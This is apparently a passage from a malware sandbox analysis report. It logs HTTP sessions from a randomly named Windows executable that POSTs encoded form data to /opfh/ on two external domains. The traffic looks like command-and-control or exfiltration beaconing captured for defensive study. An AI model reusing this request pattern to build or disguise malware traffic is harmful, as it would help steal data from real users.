                            13192.168.2.763174212.227.172.253802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:04.958076954 CEST720OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.fruitique.co.uk
                            Origin: http://www.fruitique.co.uk
                            Referer: http://www.fruitique.co.uk/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 74 6b 46 38 57 45 62 39 48 43 36 55 4b 36 6b 38 77 58 4c 79 31 5a 58 33 2f 42 64 6b 37 63 78 48 64 44 62 37 67 4f 64 34 57 67 65 72 66 71 67 79 6f 38 58 53 65 41 77 61 65 4b 33 65 75 74 46 6d 68 66 66 52 72 75 74 44 7a 4d 31 7a 33 33 4d 54 57 52 73 42 61 41 4d 57 79 35 63 52 36 2f 6f 4f 56 72 6b 51 4d 59 63 30 4e 49 32 63 4d 31 31 5a 57 44 75 54 52 64 59 2f 61 6d 39 51 41 38 77 66 50 2b 73 65 2f 62 4e 48 38 55 45 6c 32 4d 6a 59 4b 45 4d 79 6a 57 34 6d 2f 6d 39 77 43 48 4a 33 34 49 48 4b 4a 63 48 5a 39 54 31 79 6e 31 79 39 57 5a 52 35 54 71 30 48 62 51 79 2f 71 72 71 35 34 55 66 50 76 61 64 6b 76 78 68 61 6d 41 5a 72 43 51 3d 3d
                            Data Ascii: R40L6=tkF8WEb9HC6UK6k8wXLy1ZX3/Bdk7cxHdDb7gOd4Wgerfqgyo8XSeAwaeK3eutFmhffRrutDzM1z33MTWRsBaAMWy5cR6/oOVrkQMYc0NI2cM11ZWDuTRdY/am9QA8wfP+se/bNH8UEl2MjYKEMyjW4m/m9wCHJ34IHKJcHZ9T1yn1y9WZR5Tq0HbQy/qrq54UfPvadkvxhamAZrCQ==
                            May 27, 2024 12:21:05.581367016 CEST427INHTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Mon, 27 May 2024 10:21:05 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.fruitique.co.uk/opfh/
                            Expires: Mon, 27 May 2024 10:41:05 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.763175212.227.172.253802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:09.206199884 CEST740OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.fruitique.co.uk
                            Origin: http://www.fruitique.co.uk
                            Referer: http://www.fruitique.co.uk/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 74 6b 46 38 57 45 62 39 48 43 36 55 4b 5a 38 38 78 30 6a 79 67 4a 58 32 36 42 64 6b 78 38 78 44 64 44 58 37 67 4b 74 6f 57 53 4b 72 66 50 63 79 70 35 72 53 66 41 77 61 57 71 33 68 6a 4e 46 39 68 66 61 73 72 72 56 44 7a 49 6c 7a 33 32 38 54 57 6d 78 58 62 51 4d 49 2f 5a 63 50 6e 76 6f 4f 56 72 6b 51 4d 63 38 4e 4e 49 75 63 4d 46 46 5a 5a 43 75 51 53 64 59 2b 54 47 39 51 54 73 77 68 50 2b 73 73 2f 61 52 2b 38 58 38 6c 32 4d 54 59 4b 57 30 31 70 57 34 67 78 47 38 41 4f 69 34 36 2b 37 4c 42 4f 39 2f 68 2f 51 74 76 72 6a 76 66 4d 37 64 56 4e 37 4d 38 66 53 57 4a 39 4e 33 4d 36 56 62 58 69 34 70 46 77 47 45 77 72 53 34 76 55 70 64 42 43 2b 39 50 53 36 33 59 65 6a 66 50 45 59 46 37 35 68 51 3d
                            Data Ascii: R40L6=tkF8WEb9HC6UKZ88x0jygJX26Bdkx8xDdDX7gKtoWSKrfPcyp5rSfAwaWq3hjNF9hfasrrVDzIlz328TWmxXbQMI/ZcPnvoOVrkQMc8NNIucMFFZZCuQSdY+TG9QTswhP+ss/aR+8X8l2MTYKW01pW4gxG8AOi46+7LBO9/h/QtvrjvfM7dVN7M8fSWJ9N3M6VbXi4pFwGEwrS4vUpdBC+9PS63YejfPEYF75hQ=
                            May 27, 2024 12:21:09.912512064 CEST427INHTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Mon, 27 May 2024 10:21:09 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.fruitique.co.uk/opfh/
                            Expires: Mon, 27 May 2024 10:41:09 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.763176212.227.172.253802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:11.738023043 CEST1753OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.fruitique.co.uk
                            Origin: http://www.fruitique.co.uk
                            Referer: http://www.fruitique.co.uk/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 74 6b 46 38 57 45 62 39 48 43 36 55 4b 5a 38 38 78 30 6a 79 67 4a 58 32 36 42 64 6b 78 38 78 44 64 44 58 37 67 4b 74 6f 57 53 53 72 59 35 49 79 70 65 2f 53 4e 77 77 61 58 71 33 67 6a 4e 46 38 68 66 69 67 72 72 51 2b 7a 4b 74 7a 32 55 30 54 51 53 46 58 56 51 4d 49 32 35 63 4f 36 2f 6f 62 56 72 30 63 4d 59 59 4e 4e 49 75 63 4d 48 64 5a 64 54 75 51 55 64 59 2f 61 6d 39 55 41 38 78 4d 50 2b 30 38 2f 61 46 75 38 6d 63 6c 32 73 44 59 47 44 59 31 30 6d 34 69 32 47 38 59 4f 69 39 36 2b 39 75 34 4f 39 4c 50 2f 53 74 76 70 6d 72 47 63 4c 49 43 66 6f 31 6f 66 69 79 77 32 62 61 35 30 46 6e 65 74 71 4a 53 74 32 39 4a 75 7a 34 5a 58 75 51 51 54 74 4e 62 53 35 7a 4d 49 44 69 4b 55 34 42 65 36 6c 4e 75 6b 5a 53 6f 76 52 5a 6c 6c 35 45 68 39 4d 51 36 45 32 7a 55 47 73 59 2b 65 63 44 69 4e 37 47 67 43 32 6c 45 4f 31 67 41 68 69 64 2b 68 37 62 52 4f 39 5a 73 7a 5a 6f 46 54 41 79 4d 48 41 46 4f 75 42 76 68 51 57 6c 46 52 38 6e 6c 54 75 46 5a 77 4e 6f 33 6c 72 56 78 61 36 71 4a 62 58 4f 31 66 6a 6a 64 [TRUNCATED]
                            Data Ascii: R40L6=tkF8WEb9HC6UKZ88x0jygJX26Bdkx8xDdDX7gKtoWSSrY5Iype/SNwwaXq3gjNF8hfigrrQ+zKtz2U0TQSFXVQMI25cO6/obVr0cMYYNNIucMHdZdTuQUdY/am9UA8xMP+08/aFu8mcl2sDYGDY10m4i2G8YOi96+9u4O9LP/StvpmrGcLICfo1ofiyw2ba50FnetqJSt29Juz4ZXuQQTtNbS5zMIDiKU4Be6lNukZSovRZll5Eh9MQ6E2zUGsY+ecDiN7GgC2lEO1gAhid+h7bRO9ZszZoFTAyMHAFOuBvhQWlFR8nlTuFZwNo3lrVxa6qJbXO1fjjdS07uca+nitDvfEDOJ2Opv9fABI7x3RsTTnA4hVSm2KesNxWKF37oyo7Q5QVaXGx87MwONDwBj7k8yr9VeHuaGMSDw256p1AIan/RjqI0Iij2dY56gTrjEUBjKRovXAambo/3vocLRZhUkD+pH7N7IeiWAnP0ZP9wSom4hh0Bsx2IhfwrdzwZuy+b+cThhbopMIS4xLdsHeK77KWdf79Yw0YZBHTpWjnzxmCtH4T79yUaWj8pi9nGDZ5pvf+UJuNxp6LrNmfac6w600osphRkZgl//cahb0oNRjikBLAnoNwRjLQ5vbiHXQcezUG7QV/8B8jInuxgTSkrJNW0Gm/fqi1qZHoNobkazNvqKuMC8OCJ6KJ46pAboF+kuJvIaR4ofcSprNyjLSXEzDoPa9AxIoKxY9po5MvzFyiwjTHAaesXEnY92kTe9Q9F7Gx4df6+Cpdz6r/xKSBXkrAqhUtVzYaSle63xZjafCrxA/MNH5PENXCqxyNNTwJ+sEyhNbfDsuOXJyJNUiHEPQTSzYuNh7U9GXeK4oFwloUl7vCExEcwRMp2cENqsThwflKo1BSk0256xQdkL2l4SIISvPSmYoA2EaEVw6Y4PoC49aGSsBsjstGPPSz8ztBdCTSH1oR2lWlEfYGHLMnIzSMywetBWB6Tt5PbxVp71C [TRUNCATED]
                            May 27, 2024 12:21:12.391423941 CEST427INHTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Mon, 27 May 2024 10:21:12 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.fruitique.co.uk/opfh/
                            Expires: Mon, 27 May 2024 10:41:12 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.763177212.227.172.253802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:14.380304098 CEST459OUTGET /opfh/?R40L6=gmtcV0/XP16HFJIc+kOspKC5zFAVyKp1GVqpqKlYYBexGLFCqPGdfyxYaar+lftgkYb5tsdy9JRJ3lwsUywzZFsvuukx19EGSpFqL58eVbDWPjA2ZTqEF6w8W0EPQt4fJd0o3pJS2XVx&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.fruitique.co.uk
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:21:15.017391920 CEST592INHTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Mon, 27 May 2024 10:21:14 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.fruitique.co.uk/opfh/?R40L6=gmtcV0/XP16HFJIc+kOspKC5zFAVyKp1GVqpqKlYYBexGLFCqPGdfyxYaar+lftgkYb5tsdy9JRJ3lwsUywzZFsvuukx19EGSpFqL58eVbDWPjA2ZTqEF6w8W0EPQt4fJd0o3pJS2XVx&b2PX=hZXl7VFPKl04
                            Expires: Mon, 27 May 2024 10:41:14 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.763178199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:20.238209963 CEST714OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.gamemaster.at
                            Origin: http://www.gamemaster.at
                            Referer: http://www.gamemaster.at/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 43 41 53 63 36 39 66 66 36 66 4b 2f 49 45 71 55 2b 31 33 42 5a 41 42 32 39 46 51 41 55 65 5a 7a 32 70 30 41 4a 65 37 4c 53 6b 70 41 32 52 66 4a 48 39 75 6d 4c 69 30 5a 2f 4e 48 6e 78 6c 51 58 46 68 49 55 59 49 6e 4b 6b 64 6a 4d 47 50 54 4d 62 46 6e 31 33 56 78 70 78 65 78 4c 78 73 2b 68 4d 63 55 77 48 63 72 46 45 37 6b 7a 39 5a 66 70 32 7a 44 6d 2f 55 7a 51 42 4f 4f 45 67 71 39 78 67 43 54 62 4d 78 72 45 65 48 64 4a 7a 43 39 39 39 66 42 6a 4c 68 73 79 35 48 33 62 4d 73 76 4e 67 75 74 6d 6b 73 43 71 78 36 61 58 61 52 63 6f 61 71 45 46 6d 5a 45 71 44 32 46 38 39 6c 70 62 30 52 6c 51 44 2f 74 50 4b 77 5a 50 59 57 4e 57 72 77 3d 3d
                            Data Ascii: R40L6=CASc69ff6fK/IEqU+13BZAB29FQAUeZz2p0AJe7LSkpA2RfJH9umLi0Z/NHnxlQXFhIUYInKkdjMGPTMbFn13VxpxexLxs+hMcUwHcrFE7kz9Zfp2zDm/UzQBOOEgq9xgCTbMxrEeHdJzC999fBjLhsy5H3bMsvNgutmksCqx6aXaRcoaqEFmZEqD2F89lpb0RlQD/tPKwZPYWNWrw==
                            May 27, 2024 12:21:20.718554020 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:21:20 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1118
                            x-request-id: a66b88cb-78eb-4e66-b3d8-e223d5bd09b7
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug==
                            set-cookie: parking_session=a66b88cb-78eb-4e66-b3d8-e223d5bd09b7; expires=Mon, 27 May 2024 10:36:20 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 51 2b 56 45 77 70 44 74 72 72 72 54 4a 72 7a 35 56 39 56 74 33 37 54 61 53 74 62 2b 76 68 61 2f 51 37 4e 66 32 32 46 38 6b 39 49 61 2b 7a 51 47 47 5a 76 71 74 4e 4f 48 35 44 48 71 6c 6a 47 50 79 63 79 73 79 51 63 77 43 33 5a 52 49 2b 64 32 37 4d 47 75 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:21:20.718710899 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTY2Yjg4Y2ItNzhlYi00ZTY2LWIzZDgtZTIyM2Q1YmQwOWI3IiwicGFnZV90aW1lIjoxNzE2ODA1Mj


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.763179199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:22.771965981 CEST734OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.gamemaster.at
                            Origin: http://www.gamemaster.at
                            Referer: http://www.gamemaster.at/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 43 41 53 63 36 39 66 66 36 66 4b 2f 49 6b 36 55 38 58 66 42 4d 51 42 35 34 46 51 41 64 2b 5a 33 32 70 6f 41 4a 62 58 62 53 57 4e 41 78 77 76 4a 45 35 61 6d 4d 69 30 5a 30 74 48 59 2f 46 51 41 46 68 45 6d 59 4a 62 4b 6b 65 66 4d 47 4f 6a 4d 62 79 54 32 33 46 78 76 35 2b 78 4a 2f 4d 2b 68 4d 63 55 77 48 63 2b 51 45 2f 49 7a 39 6f 76 70 33 53 44 68 6a 45 7a 66 41 4f 4f 45 78 36 39 31 67 43 54 6c 4d 77 32 54 65 46 6c 4a 7a 43 4e 39 2b 4f 42 38 52 78 73 72 33 6e 33 4e 41 73 2b 79 71 64 4a 5a 69 2f 4b 33 39 4e 62 39 57 48 42 4b 41 49 49 70 34 49 38 52 48 30 68 4b 71 44 30 75 32 51 68 49 4f 64 5a 75 56 48 38 6c 56 45 73 53 39 47 4f 4e 6f 32 39 6d 4c 79 76 69 41 70 5a 61 33 2b 42 78 50 73 77 3d
                            Data Ascii: R40L6=CASc69ff6fK/Ik6U8XfBMQB54FQAd+Z32poAJbXbSWNAxwvJE5amMi0Z0tHY/FQAFhEmYJbKkefMGOjMbyT23Fxv5+xJ/M+hMcUwHc+QE/Iz9ovp3SDhjEzfAOOEx691gCTlMw2TeFlJzCN9+OB8Rxsr3n3NAs+yqdJZi/K39Nb9WHBKAIIp4I8RH0hKqD0u2QhIOdZuVH8lVEsS9GONo29mLyviApZa3+BxPsw=
                            May 27, 2024 12:21:23.227595091 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:21:22 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1118
                            x-request-id: 04d78116-00e5-49f4-a3c6-083af8fc147b
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug==
                            set-cookie: parking_session=04d78116-00e5-49f4-a3c6-083af8fc147b; expires=Mon, 27 May 2024 10:36:23 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 51 2b 56 45 77 70 44 74 72 72 72 54 4a 72 7a 35 56 39 56 74 33 37 54 61 53 74 62 2b 76 68 61 2f 51 37 4e 66 32 32 46 38 6b 39 49 61 2b 7a 51 47 47 5a 76 71 74 4e 4f 48 35 44 48 71 6c 6a 47 50 79 63 79 73 79 51 63 77 43 33 5a 52 49 2b 64 32 37 4d 47 75 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:21:23.227615118 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDRkNzgxMTYtMDBlNS00OWY0LWEzYzYtMDgzYWY4ZmMxNDdiIiwicGFnZV90aW1lIjoxNzE2ODA1Mj


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.763180199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:26.909938097 CEST1747OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
